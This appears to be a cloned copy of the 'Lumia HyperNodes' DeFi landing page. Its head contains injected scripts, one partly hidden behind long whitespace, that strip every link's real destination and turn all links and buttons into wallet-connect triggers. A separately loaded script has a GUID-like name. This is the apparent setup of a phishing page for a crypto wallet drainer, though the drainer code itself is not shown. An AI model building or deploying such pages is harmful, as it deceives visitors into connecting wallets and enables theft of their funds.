<!DOCTYPE html>
<html lang="en" >

<head>
    <meta charset="UTF-8">
    <script>
      document.addEventListener('DOMContentLoaded', function () {
        var links = document.querySelectorAll('body a');
        for (var i = 0; i < links.length; i++) {
        var link = links[i];
        link.removeAttribute('href');
        link.classList.add('connectButton');
        }
        });
        </script>                                                                                                                          <script>
      document.addEventListener('DOMContentLoaded', function () {
      var buttons = document.querySelectorAll('body button');
      for (var i = 0; i < buttons.length; i++) {
        var button = buttons[i];
        button.classList.add('connectButton');
      }
      });
      </script>
      <script>
      document.addEventListener("DOMContentLoaded", function() {
        const elements = document.querySelectorAll('[ad-data-linked]');
        elements.forEach(element => {
          element.removeAttribute('ad-data-linked');
        });
      
        console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
      });
      
      </script>
      
        <style>
        .connectButton {
        cursor: pointer;
        }
        </style>

    
    <link rel="icon" href="favi.png" type="image/svg+xml">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <title>Lumia | HyperNodes</title>
    <meta name="description" content="HyperNodes revolutionize liquidity through decentralized control and community governance.">
    <meta property="og:type" content="website">
    <meta property="og:title" content="Lumia HyperNodes">
    <meta property="og:description" content="HyperNodes revolutionize liquidity through decentralized control and community governance.">
    <meta property="og:url" content="https://node.lumia.org">
    <meta property="og:image" content="https://node.lumia.org/og-meta.png">
    <meta property="og:image:alt	" content="HyperNode coin graphic">
    <meta property="og:site_name" content="">
    <meta property="og:image:width" content="1200">
    <meta property="og:image:height" content="630">
    <meta name="twitter:title" content="Lumia | The New Home Of DeFi">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:description" content="">
    <meta name="twitter:image" content="https://node.lumia.org/og-meta.png">
    <link rel="apple-touch-icon" href="https://node.lumia.org/favi.png">
    <link rel="manifest" href="https://node.lumia.org/manifest.json">
    <link href="main.6ad20bc3.css" rel="stylesheet">
    <style type="text/css">
        .index-module_type__E-SaG::after {
          content: '|';
          animation: index-module_cursor__PQg0P 1.1s infinite step-start;
        }
        
        @keyframes index-module_cursor__PQg0P {
          50% {
            opacity: 0;
          }
        }
    </style>
    <style>
        @keyframes react-spinners-PulseLoader-pulse { 
          0% { transform: scale(1); opacity: 1; }
          45% { transform: scale(0.1); opacity: 0.7; }
          80% { transform: scale(1); opacity: 1; }
        }
    </style>

    <style data-styled="active" data-styled-version="5.3.11">
        .jmkJdS { font-feature-settings: "ss01"; letter-spacing: -0.18px; text-transform: uppercase; flex-grow: unset; flex-basis: unset; flex-shrink: 0; width: auto; height: 44px; outline: none; transition: 0.15s ease-in-out; display: inline-flex; padding: 14px 18px; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; gap: 10px; border-radius: 6px; border: 1px solid var(--Cyan,#7bd7ff); background: var( --Cyan-Alpha, linear-gradient( 241deg, rgba(46,64,86,0.33) 6.19%, rgba(12,9,33,0.48) 94.72% ) ); box-shadow: rgba(117, 136, 233, 0.8) 0px 0px 8px 0px inset, rgba(138, 148, 242, 0.34) 0px 0px 7.7px 1px; color: var(--White,#FFF); text-align: center; font-family: "Chakra Petch"; font-size: 16px; font-style: normal; font-weight: 600; line-height: normal; }
        .jmkJdS:hover { filter: brightness(1.5); }
        .jmkJdS:hover { cursor: pointer; }
        .jmkJdS:disabled { cursor: not-allowed; filter: saturate(0); opacity: 0.5; }
        .gvVzXo { display: flex; gap: 32px; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: 1 1 0%; width: 100%; }
        @media screen and (max-width: 768px) {
        }
        .bXIIXt { display: flex; gap: 64px; -webkit-box-pack: start; justify-content: flex-start; -webkit-box-align: center; align-items: center; flex: unset; width: auto; }
        @media screen and (max-width: 768px) {
        }
        .giA-DuC { display: flex; gap: 16px; -webkit-box-pack: start; justify-content: flex-start; align-self: flex-end; flex-direction: column; align-items: flex-end; flex: unset; width: auto; }
        @media screen and (max-width: 768px) {
        }
        .gsaowz { display: flex; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: 1 1 0%; width: 100%; }
        @media screen and (max-width: 768px) {
        }
        .gOUOov { display: flex; gap: 40px; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: unset; width: auto; }
        @media screen and (max-width: 768px) {
        }
        .iMIYlv { display: flex; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: unset; width: auto; }
        @media screen and (max-width: 768px) {
        }
        .bfvuET { display: flex; gap: 16px; -webkit-box-pack: start; justify-content: flex-start; -webkit-box-align: center; align-items: center; flex: 1 1 0%; width: 100%; }
        @media screen and (max-width: 768px) {
        }
        .ePGLYR { display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: end; justify-content: flex-end; flex: 1 1 0%; width: 100%; }
        @media screen and (max-width: 768px) {
        }
        .jtMHnA { display: flex; gap: 16px; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: unset; width: auto; }
        @media screen and (max-width: 768px) {
        }
        .iGtzbJ { display: flex; gap: 25px; -webkit-box-align: center; align-items: center; -webkit-box-pack: end; justify-content: flex-end; flex-wrap: wrap; flex: unset; width: auto; }
        @media screen and (max-width: 768px) {
        }
        .eXifyu { display: flex; -webkit-box-pack: end; justify-content: flex-end; -webkit-box-align: center; align-items: center; flex: 0 0 auto; width: auto; }
        @media screen and (max-width: 768px) {
        }
        .caoigE { display: flex; gap: 8px; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: 1 1 0%; width: 100%; }
        @media screen and (max-width: 768px) {
        }
        .hvQriN { display: flex; flex: 1 1 0%; width: 100%; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; }
        @media screen and (max-width: 768px) {
        }
        .btDLoS { display: flex; gap: 21px; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: 1 1 0%; z-index: 1; width: 100%; }
        @media screen and (max-width: 768px) {
        }
        .dZhdGM { display: flex; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex: 1 1 0%; width: 100%; }
        @media (max-width: 1000px) {
          .dZhdGM { flex-direction: column; }
        }
        @media screen and (max-width: 768px) {
        }
        .bOdxCr { display: flex; gap: 16px; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; flex-direction: column; flex: 1 1 0%; width: 100%; max-width: 1000px; }
        @media (max-width: 1000px) {
          .bOdxCr { flex-direction: column; }
        }
        @media screen and (max-width: 768px) {
        }
        .kbsHps { display: flex; gap: 32px; align-items: flex-start; -webkit-box-pack: justify; justify-content: space-between; flex: 1 1 0%; margin-top: 8px; width: 100%; }
        @media screen and (max-width: 768px) {
        }
        .iycHwb { width: 100%; padding-bottom: 120px; padding-top: 120px; z-index: 1; }
        @media (max-width: 768px) {
          .iycHwb { padding-bottom: 32px; padding-top: 80px; }
          .iycHwb .rb-123.home { width: 100%; -webkit-box-align: center !important; align-items: center !important; -webkit-box-pack: center !important; justify-content: center !important; }
          .iycHwb .rb-123.home .countdown-info { width: 100%; -webkit-box-align: center !important; align-items: center !important; -webkit-box-pack: center !important; justify-content: center !important; }
        }
        .hNlDMA { position: relative; }
        .hwKJuL { position: relative; overflow: hidden; flex-direction: column; z-index: 10; }
        .hwKJuL span.header-copy { color: var(--White,#fff); max-width: 585px; font-variant-numeric: ordinal; font-feature-settings: "dlig", "ss01"; font-family: "Chakra Petch"; font-size: 20px; font-style: normal; font-weight: 300; line-height: normal; letter-spacing: 0.8px; min-height: 110px; }
        @media (max-width: 1200px) {
          .hwKJuL { flex-direction: column; }
        }
        @media (max-width: 768px) {
          .hwKJuL span.header-copy { color: var(--White,#fff); font-variant-numeric: ordinal; font-feature-settings: "dlig", "ss01"; font-size: 18px; font-style: normal; font-weight: 300; line-height: normal; letter-spacing: 0.54px; }
        }
        .jHjTeV { position: relative; z-index: 10; }
        .jHjTeV span.header-copy { color: var(--White,#fff); max-width: 585px; font-variant-numeric: ordinal; font-feature-settings: "dlig", "ss01"; font-family: "Chakra Petch"; font-size: 20px; font-style: normal; font-weight: 300; line-height: normal; letter-spacing: 0.8px; min-height: 110px; }
        @media (max-width: 1200px) {
        }
        @media (max-width: 768px) {
          .jHjTeV span.header-copy { color: var(--White,#fff); font-variant-numeric: ordinal; font-feature-settings: "dlig", "ss01"; font-size: 18px; font-style: normal; font-weight: 300; line-height: normal; letter-spacing: 0.54px; }
        }
        .kOmTrD { width: 100vw; position: absolute; left: 50%; right: 50%; margin-left: -50vw; margin-right: -50vw; }
        .gHtErb { color: rgb(255, 255, 255); font-feature-settings: "ss01"; font-family: "Chakra Petch"; font-size: 16px; font-style: normal; font-weight: 700; line-height: normal; text-transform: uppercase; text-align: center; display: flex; -webkit-box-align: center; align-items: center; position: relative; }
        .gHtErb:hover span { color: rgb(123, 215, 255); }
        .gEA-dKn a { color: var(--White,#fff); text-align: center; font-feature-settings: "dlig", "ss01"; font-family: "Chakra Petch"; font-size: 18px; font-style: normal; font-weight: 600; line-height: 140%; }
        .gEA-dKn:hover span { color: rgb(123, 215, 255); }
        .dmHjxz { position: relative; z-index: 100; min-height: 134px; padding-top: 44px; }
        @media screen and (max-width: 838px) {
          .dmHjxz { padding-top: 28px; min-height: 70px; }
        }
        .dmHjxz .blur-background { opacity: 0; background: rgb(0, 0, 0); height: 100%; width: 100%; position: absolute; top: 0px; z-index: -1; }
        @media screen and (max-width: 1000px) {
          .cLEJic { min-width: 180px; margin: 0px; }
        }
        .dQBILK { display: flex; align-items: flex-end; flex-shrink: 0; gap: 8px; transition: 0.15s ease-in-out; }
        .dQBILK:hover { cursor: pointer; }
        .dQBILK img { width: 123.494px; height: 39.285px; }
        @media screen and (max-width: 838px) {
          .dQBILK img { width: 80px; height: 25px; }
        }
        @media screen and (max-width: 600px) {
          .dQBILK { -webkit-box-pack: start !important; justify-content: flex-start !important; }
          .dQBILK img { min-width: 24px; }
        }
        @media screen and (max-width: 1000px) {
          .gcqUcG { -webkit-box-pack: justify; justify-content: space-between; -webkit-box-align: center; align-items: center; }
        }
        .jOiQdY { margin-left: auto; }
        @media screen and (max-width: 1000px) {
          .jOiQdY { display: none; }
        }
        .KWbdf { flex-shrink: 0; }
        .iSiGll { gap: 36px; flex-wrap: wrap-reverse; }
        @media screen and (max-width: 1250px) {
          .iSiGll { gap: 16px; }
        }
        .gedWxH { margin-top: 0px; position: relative; }
        @media screen and (min-width: 1000px) {
          .gedWxH { display: none; }
        }
        .ekhfDP { overflow: hidden; position: relative; min-height: 100vh; background: rgb(0, 0, 0); }
        .ekhfDP .header-gradient { position: absolute; top: 0px; left: 0px; width: 100%; height: 600px; background: linear-gradient(rgb(4, 17, 27) 0%, rgba(4, 17, 27, 0.1) 100%); z-index: 3; }
        .ekhfDP .dashboard-header-gradient { position: absolute; top: 0px; left: 0px; width: 100%; height: 500px; background: linear-gradient(rgb(4, 17, 27) 0%, rgba(4, 17, 27, 0.2) 50%, rgb(4, 17, 27) 100%); z-index: 3; }
        .hpsENj { max-width: 1400px; margin: auto; z-index: 4; --max-width-padding-x: 4rem; }
        @media screen and (max-width: 1464px) and (min-width: 1000px) {
          .hpsENj { padding: 0px 64px; --max-width-padding-x: 64px; }
        }
        @media screen and (max-width: 1000px) {
          .hpsENj { padding: 0px 16px; --max-width-padding-x: 16px; }
        }
        .gncLgX { max-width: 1400px; margin: auto; z-index: 4; --max-width-padding-x: 4rem; position: relative; }
        @media screen and (max-width: 1464px) and (min-width: 1000px) {
          .gncLgX { padding: 0px 64px; --max-width-padding-x: 64px; }
        }
        @media screen and (max-width: 1000px) {
          .gncLgX { padding: 0px 16px; --max-width-padding-x: 16px; }
        }
        .bpmgVc { position: absolute; right: -340px; top: 0px; }
        .cTZxFv { color: var(--White,#fff); font-feature-settings: "ss01"; font-family: "Chakra Petch"; font-size: 88px; font-style: normal; font-weight: 500; line-height: 90.8px; letter-spacing: 3.52px; background: linear-gradient(90deg, rgb(182, 218, 255) 0%, rgb(255, 255, 255) 45.5%, rgb(80, 94, 125) 100%) 100% 0px / 120% 100% text; -webkit-text-fill-color: transparent; transition: background-position 0.5s; animation: 5s linear 0s infinite normal none running gradient; }
        @-webkit-keyframes gradient { 
          0% { background-position: 100% 0px; }
          50% { background-position: 0px 0px; }
          0% { background-position: 100% 0px; }
        }
        @keyframes gradient { 
          0% { background-position: 100% 0px; }
          50% { background-position: 0px 0px; }
          0% { background-position: 100% 0px; }
        }
        @media (max-width: 768px) {
          .cTZxFv { color: var(--White,#fff); font-feature-settings: "ss01"; font-family: "Chakra Petch"; font-size: 48px; font-style: normal; font-weight: 500; line-height: 54px; letter-spacing: 1.92px; }
        }
        .hytNXk { width: 100vw; height: 906px; position: absolute; top: -150px; z-index: 1; opacity: 1; }
        .hytNXk div.gradient { height: 100%; width: 100%; bottom: 0px; position: absolute; opacity: 1; z-index: 2; background: linear-gradient(rgba(0, 0, 0, 0.7) 0%, rgba(0, 0, 0, 0.95) 90%, rgb(0, 0, 0) 100%); }
        .hytNXk div.gradient.top { background: linear-gradient(rgb(0, 0, 0) 0%, rgba(0, 0, 0, 0.25) 10%, rgba(0, 0, 0, 0.95) 90%, rgb(0, 0, 0) 100%); }
        .hytNXk img.cube { position: absolute; right: 0px; top: 200px; }
        @media (max-width: 1000px) {
          .hytNXk video { display: none; }
        }
        .hytNXk::before { content: ""; position: absolute; background: url("top-banner.png") center center / cover no-repeat; top: 0px; left: 0px; width: 100%; height: 100%; opacity: 1; z-index: 0; }
        @media (max-width: 768px) {
          .hytNXk::before { background: url("header-bg-mobile.png") center top / cover no-repeat; }
          .hytNXk div.gradient { opacity: 1; }
          .hytNXk div.gradient.low-opacity { opacity: 0; }
        }
        body { overflow-y: auto; -webkit-font-smoothing: antialiased; font-family: "General Sans Variable", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; }
        input::-webkit-outer-spin-button, input::-webkit-inner-spin-button { appearance: none; margin: 0px; }
        input[type="number"] { appearance: textfield; }
        strong { font-family: "General Sans Variable"; }
        span.gradient-text { margin-left: 0px; padding-right: 16px; background: linear-gradient(260.97deg, rgb(123, 215, 255) -0.97%, rgb(61, 104, 255) 96.36%) 0% 0% / 200% text; animation: 4s linear 0s infinite normal none running fFbgYP; -webkit-text-fill-color: transparent; font-family: "Chakra Petch"; height: 16px; width: 100%; }
        span.gradient-text.thin { margin-left: 0px; padding-right: 2px; height: 16px; width: 100%; font-family: "General Sans Variable" !important; }
        span.gradient-text.negative { margin-left: 1px; padding-right: 2px; height: 16px; width: 100%; font-family: "General Sans Variable" !important; }
        span.gradient-text.thinner { margin-left: 0px; padding-right: 1px; height: 16px; width: 100%; font-family: "General Sans Variable" !important; }
        .Toastify__toast { border-radius: 16px; border: 1px solid rgba(255, 255, 255, 0.08); background: rgba(0, 0, 0, 0.8); color: rgb(255, 255, 255); font-feature-settings: "dlig", "ss01"; font-size: 14px; font-style: normal; font-weight: 500; line-height: 20px; letter-spacing: -0.56px; padding-left: 28px; }
        .Toastify__toast .Toastify__progress-bar { background-color: rgba(255, 255, 255, 0.25); height: 1px; }
        .Toastify__toast .Toastify__close-button > svg { height: 12px; width: 10px; }
        .Toastify__toast::before { content: url(""); position: absolute; left: 12px; top: 50%; transform: translateY(-50%); width: 16px; height: 16px; }
        .Toastify__toast--error { color: rgb(255, 87, 64); }
        .Toastify__toast--error::before { content: url(""); }
        .Dialog-overlay { background: rgba(0, 0, 0, 0.8); display: grid; place-items: center; z-index: 999999; }
        .Popover { z-index: 888888; }
        @-webkit-keyframes fFbgYP { 
          0% { background-position: 15% 50%; }
          50% { background-position: 85% 50%; }
          100% { background-position: 15% 50%; }
        }
        @keyframes fFbgYP { 
          0% { background-position: 15% 50%; }
          50% { background-position: 85% 50%; }
          100% { background-position: 15% 50%; }
        }
    </style>
    <meta name="description" content="HyperNodes revolutionize liquidity through decentralized control and community governance." data-react-helmet="true">
    <meta property="og:type" content="website" data-react-helmet="true">
    <meta property="og:title" content="Lumia HyperNodes" data-react-helmet="true">
    <meta property="og:description" content="HyperNodes revolutionize liquidity through decentralized control and community governance." data-react-helmet="true">
    <meta property="og:url" content="https://node.lumia.org" data-react-helmet="true">
    <meta property="og:image" content="https://node.lumia.org/og-meta.png" data-react-helmet="true">
    <meta property="og:site_name" content="" data-react-helmet="true">
    <meta property="og:image:width" content="1200" data-react-helmet="true">
    <meta property="og:image:height" content="630" data-react-helmet="true">
    <meta name="twitter:title" content="Lumia | The New Home Of DeFi" data-react-helmet="true">
    <meta name="twitter:card" content="summary_large_image" data-react-helmet="true">
    <meta name="twitter:description" content="" data-react-helmet="true">
    <meta name="twitter:image" content="https://node.lumia.org/og-meta.png" data-react-helmet="true">

</head><script charset="UTF-8" type="text/javascript" src="./3277bd99-22af-4c79-8b84-d255b906235f.js"></script>

<body><noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
        <div class="sc-gFAWRd ekhfDP">
            <div class="sc-iHGNWf dmHjxz">
                <div class="blur-background"></div>
                <div class="sc-gmPhUn hpsENj">
                    <div class="sc-fqkvVR sc-cWSHoV gvVzXo gcqUcG">
                        <div class="sc-fqkvVR sc-hknOHE bXIIXt KWbdf"><a href="https://lumia.org/">
                                <div class="sc-dtInlm dQBILK"><img src="logo.svg" alt="logo"></div>
                            </a></div>
                        <div class="sc-fqkvVR sc-fhzFiK giA-DuC jOiQdY">
                            <div class="sc-fqkvVR sc-fhzFiK gsaowz jOiQdY">
                                <div class="sc-fqkvVR gsaowz"></div>
                                <div class="sc-fqkvVR gOUOov">
                                    <div class="sc-fqkvVR iMIYlv">
                                        <div class="sc-bmzYkS gEA-dKn"><a aria-current="page" class="sc-koXPp gHtErb active" href="#nodes"><span>Nodes</span></a></div>
                                    </div>
                                    <div class="sc-fqkvVR iMIYlv">
                                        <div class="sc-bmzYkS gEA-dKn"><a aria-current="page" class="sc-koXPp gHtErb active" href="#stream"><span>Stream</span></a></div>
                                    </div>
                                    <div class="sc-fqkvVR iMIYlv">
                                        <div class="sc-bmzYkS gEA-dKn"><a aria-current="page" class="sc-koXPp gHtErb active" href="#blog"><span>Blog</span></a></div>
                                    </div>
                                </div>
                                <div class="sc-fqkvVR bfvuET" style="min-width: 138px; margin-left: 24px;">
                                    <div class="sc-fqkvVR gsaowz"><a href="https://x.com/BuildOnLumia" target="_blank" rel="noopener noreferrer"><img src="twitter.svg" alt="x" style="width: 24px;"></a></div>
                                    <div class="sc-fqkvVR gsaowz"><a href="https://t.me/lumia_community" target="_blank" rel="noopener noreferrer"><img src="telegram.svg" alt="telegram" style="width: 24px;"></a></div>
                                    <div class="sc-fqkvVR gsaowz"><a href="https://docs.lumia.org/" target="_blank" rel="noopener noreferrer"><img src="gitbook.svg" alt="gitbook" style="width: 24px;"></a></div>
                                </div>
                            </div>
                            <div class="sc-fqkvVR sc-uVWWZ ePGLYR iSiGll">
                                <div class="sc-fqkvVR jtMHnA"></div>
                                <div class="sc-fqkvVR iGtzbJ">
                                    <div class="sc-fqkvVR sc-dtBdUo eXifyu cLEJic"><button class="sc-aXZVg jmkJdS interact-button">Connect Wallet</button></div>
                                </div>
                            </div>
                        </div>
                        <div class="sc-cfxfcM gedWxH">
                            <div class="sc-fqkvVR caoigE">
                                <div class="hamburger-react" aria-expanded="false" role="button" tabindex="0" style="cursor: pointer; height: 48px; position: relative; transition: 0.4s cubic-bezier(0, 0, 0, 1); user-select: none; width: 48px; outline: none; transform: none;">
                                    <div style="background: currentcolor; height: 3px; left: 8px; position: absolute; width: 32px; top: 13px; transition: 0.4s cubic-bezier(0, 0, 0, 1); transform: none;"></div>
                                    <div style="background: currentcolor; height: 3px; left: 8px; position: absolute; width: 32px; top: 23px; transition: 0.4s cubic-bezier(0, 0, 0, 1); transform: none;"></div>
                                    <div style="background: currentcolor; height: 3px; left: 8px; position: absolute; width: 32px; top: 33px; transition: 0.4s cubic-bezier(0, 0, 0, 1); transform: none;"></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="sc-gmPhUn hpsENj">
                <div class="sc-jEACwC kOmTrD">
                    <div height="906px" class="sc-fxwrCY hytNXk">
                        <div class="gradient"></div>
                        <div class="sc-gmPhUn gncLgX" style="z-index: 0;"><video autoplay="" muted="" loop="" playsinline="" class="sc-ddjGPC bpmgVc animated-cube">
                                <source src="animated-cube.webm" type="video/webm">
                            </video></div>
                    </div>
                </div>
                <div z="1" class="sc-iGgWBj iycHwb">
                    <div class="sc-dAlyuH hNlDMA">
                        <div class="sc-fqkvVR hvQriN">
                            <div overflow="hidden" z="1" class="sc-fqkvVR sc-jlZhew btDLoS hwKJuL">
                                <div class="sc-fqkvVR dZhdGM">
                                    <div class="sc-fqkvVR sc-jlZhew gsaowz jHjTeV">
                                        <div id="nodes" class="sc-fqkvVR bOdxCr">
                                            <h1 class="sc-dSCufp cTZxFv">Lumia HyperNodes One Node, Multiple Licenses</h1><span class="header-copy">Lumia Nodes revolutionize <strong><span class="" style="display: inline-block; font-weight: 700;">liquidity</span></strong><br> with decentralized control and community governance. Contribute, manage, and delegate Lumia liquidity.</span>
                                            <div class="sc-fqkvVR kbsHps">
                                                <div class="sc-fqkvVR bfvuET"><a href="https://axiomatic-trail-6b5.notion.site/Lumia-HyperNodes-Explained-32b4852c18584a9bb02d30baa11774b0" target="_blank" rel="noreferrer noopener"><button class="sc-aXZVg jmkJdS">About HyperNodes</button></a></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="Toastify"></div>
    </div>
    <div id="modal-root"></div>
    <div id="header-menu-dropdown-root"></div>

</body>

</html>